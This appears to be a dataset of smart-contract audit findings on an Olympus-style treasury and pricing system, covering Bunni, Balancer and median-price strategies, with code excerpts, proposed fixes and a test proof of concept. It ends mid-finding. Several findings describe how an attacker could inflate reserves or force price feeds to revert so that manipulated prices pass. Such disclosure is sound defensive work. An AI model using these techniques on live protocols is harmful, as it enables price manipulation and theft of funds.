-Incorrect ProtocolOwnedLiquidityOhm calculation due to inclusion of other user's reservesчhighчProtocolOwnedLiquidityOhm for Bunni can include the liquidity deposited by other users which is not protocol owned\\nThe protocol owned liquidity in Bunni is calculated as the sum of reserves of all the BunniTokens\\n```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n\\nThe deposit function of Bunni allows any user to add liquidity to a token. Hence the returned reserve will contain amounts other than the reserves that actually belong to the protocol\\n```\\n // @audit callable by any user\\n function deposit(\\n DepositParams calldata params\\n )\\n external\\n payable\\n virtual\\n override\\n checkDeadline(params.deadline)\\n returns (uint256 shares, uint128 addedLiquidity, uint256 amount0, uint256 amount1)\\n {\\n }\\n```\\nчGuard the deposit function in BunniHub or compute the liquidity using shares belonging to the protocolчIncorrect assumption of the protocol owned liquidity and hence the supply. An attacker can inflate the liquidity reserves The wider system relies on the supply calculation to be correct in order to perform actions of economical impactч```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n -Incorrect StablePool BPT price calculationчhighчIncorrect StablePool BPT price calculation as rate's are not considered\\nThe price of a stable pool BPT is computed as:\\nminimum price among the pool tokens obtained via feeds * return value of `getRate()`\\nThis method is used referring to an old documentation of Balancer\\n```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n\\nThe `getRate()` function returns the exchange `rate` of a BPT to the underlying base asset of the pool which can be different from the minimum market priced asset for pools with `rateProviders`. To consider this, the price obtained from feeds must be divided by the `rate` provided by `rateProviders` before choosing the minimum as mentioned in the previous version of Balancer's documentation.\\n1. Get market price for each constituent token\\nGet market price of wstETH and WETH in terms of USD, using chainlink oracles.\\n2. Get RateProvider price for each constituent token\\nSince wstETH - WETH pool is a MetaStablePool and not a ComposableStablePool, it does not have `getTokenRate()` function. Therefore, it`s needed to get the RateProvider price manually for wstETH, using the rate providers of the pool. The rate provider will return the wstETH token in terms of stETH.\\nNote that WETH does not have a rate provider for this pool. In that case, assume a value of `1e18` (it means, market price of WETH won't be divided by any value, and it's used purely in the minPrice formula).\\n3. Get minimum price\\n$$ minPrice = min({P_{M_{wstETH}} \\over P_{RP_{wstETH}}}, P_{M_{WETH}}) $$\\n4. Calculates the BPT price\\n$$ P_{BPT_{wstETH-WETH}} = minPrice * rate_{pool_{wstETH-WETH}} $$\\nwhere `rate_pool_wstETH-WETH` is `pool.getRate()` of wstETH-WETH pool.\\nExample\\nAt block 18821323: cbeth : 2317.48812 wstEth : 2526.84 pool total supply : 0.273259897168240633 getRate() : 1.022627523581711856 wstRateprovider rate : 1.150725009180224306 cbEthRateProvider rate : 1.058783029570983377 wstEth balance : 0.133842314907166538 cbeth balance : 0.119822100236557012 tvl : (0.133842314907166538 * 2526.84 + 0.119822100236557012 * 2317.48812) == 615.884408812\\naccording to current implementation: bpt price = 2317.48812 * 1.022627523581711856 == 2369.927137086 calculated tvl = bpt price * total supply = 647.606045776\\ncorrect calculation: rate_provided_adjusted_cbeth = (2317.48812 / 1.058783029570983377) == 2188.822502132 rate_provided_adjusted_wsteth = (2526.84 / 1.150725009180224306) == 2195.867804942 bpt price = 2188.822502132 * 1.022627523581711856 == 2238.350134915 calculated tvl = bpt price * total supply = (2238.350134915 * 0.273259897168240633) == 611.651327693чFor pools having rate providers, divide prices by rate before choosing the minimumчIncorrect calculation of bpt price. Has possibility to be over and under valued.ч```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n -Inconsistency in BunniToken Price CalculationчmediumчThe deviation check (_validateReserves()) from BunniPrice.sol considers both position reserves and uncollected fees when validating the deviation with TWAP, while the final price calculation (_getTotalValue()) only accounts for position reserves, excluding uncollected fees.\\nThe same is applied to BunniSupply.sol where `getProtocolOwnedLiquidityOhm()` validates reserves + fee deviation from TWAP and then returns only Ohm reserves using `lens_.getReserves(key_)`\\nNote that `BunniSupply.sol#getProtocolOwnedLiquidityReserves()` validates deviation using reserves+fees with TWAP and then return reserves+fees in a good way without discrepancy.\\nBut this could lead to a misalignment between the deviation check and actual price computation.\\nDeviation Check : `_validateReserves` Function:\\n```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n\\nYou can see that the deviation check includes uncollected fees in the `reservesTokenRatio`, potentially leading to a higher or more volatile ratio compared to the historical `twapTokenRatio`.\\nFinal Price Calculation in `BunniPrice.sol#_getTotalValue()` :\\n```\\n function _getTotalValue(\\n BunniToken token_,\\n BunniLens lens_,\\n uint8 outputDecimals_\\n ) internal view returns (uint256) {\\n (address token0, uint256 reserve0, address token1, uint256 reserve1) = _getBunniReserves(\\n token_,\\n lens_,\\n outputDecimals_\\n );\\n uint256 outputScale = 10 ** outputDecimals_;\\n\\n // Determine the value of each reserve token in USD\\n uint256 totalValue;\\n totalValue += _PRICE().getPrice(token0).mulDiv(reserve0, outputScale);\\n totalValue += _PRICE().getPrice(token1).mulDiv(reserve1, outputScale);\\n\\n return totalValue;\\n }\\n```\\n\\nYou can see that this function (_getTotalValue()) excludes uncollected fees in the final valuation, potentially overestimating the total value within deviation check process, meaning the check could pass in certain conditions whereas it could have not pass if fees where not accounted on the deviation check. Moreover the below formula used :\\n$$ price_{LP} = {reserve_0 \\times price_0 + reserve_1 \\times price_1} $$\\nwhere $reserve_i$ is token $i$ reserve amount, $price_i$ is the price of token $i$\\nIn short, it is calculated by getting all underlying balances, multiplying those by their market prices\\nHowever, this approach of directly computing the price of LP tokens via spot reserves is well-known to be vulnerable to manipulation, even if TWAP Deviation is checked, the above summary proved that this method is not 100% bullet proof as there are discrepancy on what is mesured. Taken into the fact that the process to check deviation is not that good plus the fact that methodology used to compute price is bad, the impact of this is high\\nThe same can be found in BunnySupply.sol `getProtocolOwnedLiquidityReserves()` :\\n```\\n function getProtocolOwnedLiquidityReserves()\\n external\\n view\\n override\\n returns (SPPLYv1.Reserves[] memory)\\n {\\n // Iterate through tokens and total up the reserves of each pool\\n uint256 len = bunniTokens.length;\\n SPPLYv1.Reserves[] memory reserves = new SPPLYv1.Reserves[](len);\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniToken token = tokenData.token;\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(token);\\n (\\n address token0,\\n address token1,\\n uint256 reserve0,\\n uint256 reserve1\\n ) = _getReservesWithFees(key, lens);\\n\\n // Validate reserves\\n _validateReserves(\\n key,\\n lens,\\n tokenData.twapMaxDeviationBps,\\n tokenData.twapObservationWindow\\n );\\n\\n address[] memory underlyingTokens = new address[](2);\\n underlyingTokens[0] = token0;\\n underlyingTokens[1] = token1;\\n uint256[] memory underlyingReserves = new uint256[](2);\\n underlyingReserves[0] = reserve0;\\n underlyingReserves[1] = reserve1;\\n\\n reserves[i] = SPPLYv1.Reserves({\\n source: address(token),\\n tokens: underlyingTokens,\\n balances: underlyingReserves\\n });\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n return reserves;\\n }\\n```\\n\\nWhere returned value does not account for uncollected fees whereas deviation check was accounting for itчAlign the methodology used in both the deviation check and the final price computation. This could involve either including the uncollected fees in both calculations or excluding them in both.\\nIt's ok for BunniSupply as there are 2 functions handling both reserves and reserves+fees but change deviation check process on the second one to include only reserves when checking deviation twap ratioч`_getTotalValue()` from BunniPrice.sol and `getProtocolOwnedLiquidityReserves()` from BunniSupply.sol have both ratio computation that includes uncollected fees to compare with TWAP ratio, potentially overestimating the total value compared to what these functions are aim to, which is returning only the reserves or LP Prices by only taking into account the reserves of the pool. Meaning the check could pass in certain conditions where fees are included in the ratio computation and the deviation check process whereas the deviation check should not have pass without the fees accounted.ч```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n -Price can be miscalculated.чmediumчIn `SimplePriceFeedStrategy.sol#getMedianPrice` function, when the length of `nonZeroPrices` is 2 and they are deviated it returns first non-zero value, not median value.\\n`SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` is as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n\\nAs you can see above, on L237 it gets the list of non-zero prices. If the length of this list is smaller than 3, it assumes that a median price cannot be calculated and returns first non-zero price. This is wrong. If the number of non-zero prices is 2 and they are deviated, it has to return median value. The `_getMedianPrice` function called on L253 is as follows.\\n```\\n function _getMedianPrice(uint256[] memory prices_) internal pure returns (uint256) {\\n uint256 pricesLen = prices_.length;\\n\\n // If there are an even number of prices, return the average of the two middle prices\\n if (pricesLen % 2 == 0) {\\n uint256 middlePrice1 = prices_[pricesLen / 2 - 1];\\n uint256 middlePrice2 = prices_[pricesLen / 2];\\n return (middlePrice1 + middlePrice2) / 2;\\n }\\n\\n // Otherwise return the median price\\n // Don't need to subtract 1 from pricesLen to get midpoint index\\n // since integer division will round down\\n return prices_[pricesLen / 2];\\n }\\n```\\n\\nAs you can see, the median value can be calculated from two values. This problem exists at `getMedianPrice` function as well.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\nчFirst, `SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` function has to be rewritten as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n- if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n+ if (nonZeroPrices.length < 2) return firstNonZeroPrice;\\n\\n // rest of code\\n }\\n```\\n\\nSecond, `SimplePriceFeedStrategy.sol#getMedianPrice` has to be modified as following.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n- if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n+ if (nonZeroPricesLen < 2) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\nчWhen the length of `nonZeroPrices` is 2 and they are deviated, it returns first non-zero value, not median value. It causes wrong calculation error.ч```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n -Price calculation can be manipulated by intentionally reverting some of price feeds.чmediumчPrice calculation module iterates through available price feeds for the requested asset, gather prices of non-revert price feeds and then apply strategy on available prices to calculate final asset price. By abusing this functionality, an attacker can let some price feeds revert to get advantage from any manipulated price feed.\\nHere we have some methods that attackers can abuse to intentionally revert price feeds.\\nUniswapV3 price feed UniswapV3Price.sol#L210-214\\n```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n\\nIn UniswapV3 price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it from UniswapV3's callback methods.\\nBalancer price feed BalancerPoolTokenPrice.sol#L388 BalancerPoolTokenPrice.sol#487 BalancerPoolTokenPrice.sol#599 BalancerPoolTokenPrice.sol#748\\n```\\n// Prevent re-entrancy attacks\\nVaultReentrancyLib.ensureNotInVaultContext(balVault);\\n```\\n\\nIn BalancerPool price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it in the middle of Balancer action.\\nBunniToken price feed BunniPirce.sol#L155-160\\n```\\n_validateReserves(\\n _getBunniKey(token),\\n lens,\\n params.twapMaxDeviationsBps,\\n params.twapObservationWindow\\n);\\n```\\n\\nIn BunniToken price feed, it validates reserves and reverts if it doesn't satisfy deviation. Since BunniToken uses UniswapV3, this can be intentionally reverted by calling it from UniswapV3's mint callback.\\n\\nUsually for ERC20 token prices, above 3 price feeds are commonly used combined with Chainlink price feed, and optionally with `averageMovingPrice`. There are another two points to consider here:\\nWhen average moving price is used, it is appended at the end of the price array. OlympusPrice.v2.sol#L160\\n```\\nif (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n```\\n\\nIn price calculation strategy, first non-zero price is used when there are 2 valid prices: `getMedianPriceIfDeviation` - SimplePriceFeedStrategy.sol#L246 `getMedianPrice` - SimplePriceFeedStrategy.sol#L313 For `getAveragePrice` and `getAveragePriceIfDeviation`, it uses average price if it deviates.\\n\\nBased on the information above, here are potential attack vectors that attackers would try:\\nWhen Chainlink price feed is manipulated, an attacker can disable all three above price feeds intentionally to get advantage of the price manipulation.\\nWhen Chainlink price feed is not used for an asset, an attacker can manipulate one of above 3 spot price feeds and disable other ones.\\nWhen `averageMovingPrice` is used and average price strategy is applied, the manipulation effect becomes half: $\\frac{(P + \\Delta X) + (P)}{2} = P + \\frac{\\Delta X}{2}, P=Market Price, \\Delta X=Manipulated Amount$чFor the cases above that price feeds being intentionally reverted, the price calculation itself also should revert without just ignoring it.чAttackers can disable some of price feeds as they want with ease, they can get advantage of one manipulated price feed.ч```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n -getReservesByCategory() when useSubmodules =true and submoduleReservesSelector=bytes4(0) will revertчmediumчin `getReservesByCategory()` Lack of check `data.submoduleReservesSelector!=\"\"` when call `submodule.staticcall(abi.encodeWithSelector(data.submoduleReservesSelector));` will revert\\nwhen `_addCategory()` if `useSubmodules==true`, `submoduleMetricSelector` must not empty and `submoduleReservesSelector` can empty (bytes4(0))\\nlike \"protocol-owned-treasury\"\\n```\\n _addCategory(toCategory(\"protocol-owned-treasury\"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n\\nbut when call `getReservesByCategory()` , don't check `submoduleReservesSelector!=bytes4(0)` and direct call `submoduleReservesSelector`\\n```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n // If category requires data from submodules, count all submodules and their sources.\\n len = (data.useSubmodules) ? submodules.length : 0;\\n\\n// rest of code\\n\\n for (uint256 i; i < len; ) {\\n address submodule = address(_getSubmoduleIfInstalled(submodules[i]));\\n (bool success, bytes memory returnData) = submodule.staticcall(\\n abi.encodeWithSelector(data.submoduleReservesSelector)\\n );\\n```\\n\\nthis way , when call like `getReservesByCategory(toCategory(\"protocol-owned-treasury\")` will revert\\nPOC\\nadd to `SUPPLY.v1.t.sol`\\n```\\n function test_getReservesByCategory_includesSubmodules_treasury() public {\\n _setUpSubmodules();\\n\\n // Add OHM/gOHM in the treasury (which will not be included)\\n ohm.mint(address(treasuryAddress), 100e9);\\n gohm.mint(address(treasuryAddress), 1e18); // 1 gOHM\\n\\n // Categories already defined\\n\\n uint256 expectedBptDai = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_DAI_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n uint256 expectedBptOhm = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_OHM_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n\\n // Check reserves\\n SPPLYv1.Reserves[] memory reserves = moduleSupply.getReservesByCategory(\\n toCategory(\"protocol-owned-treasury\")\\n );\\n }\\n```\\n\\n```\\n forge test -vv --match-test test_getReservesByCategory_includesSubmodules_treasury\\n\\nRunning 1 test for src/test/modules/SPPLY/SPPLY.v1.t.sol:SupplyTest\\n[FAIL. Reason: SPPLY_SubmoduleFailed(0xeb502B1d35e975321B21cCE0E8890d20a7Eb289d, 0x0000000000000000000000000000000000000000000000000000000000000000)] test_getReservesByCategory_includesSubmodules_treasury() (gas: 4774197\\n```\\nч```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n\\n\\n CategoryData memory data = categoryData[category_];\\n uint256 categorySubmodSources;\\n // If category requires data from submodules, count all submodules and their sources.\\n// Remove the line below\\n len = (data.useSubmodules) ? submodules.length : 0;\\n// Add the line below\\n len = (data.useSubmodules && data.submoduleReservesSelector!=bytes4(0)) ? submodules.length : 0;\\n```\\nчsome category can't get `Reserves`ч```\\n _addCategory(toCategory(\"protocol-owned-treasury\"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n -Balancer LP valuation methodologies use the incorrect supply metricчmediumчIn various Balancer LP valuations, totalSupply() is used to determine the total LP supply. However this is not the appropriate method for determining the supply. Instead getActualSupply should be used instead. Depending on the which pool implementation and how much LP is deployed, the valuation can be much too high or too low. Since the RBS pricing is dependent on this metric. It could lead to RBS being deployed at incorrect prices.\\nAuraBalancerSupply.sol#L345-L362\\n```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / 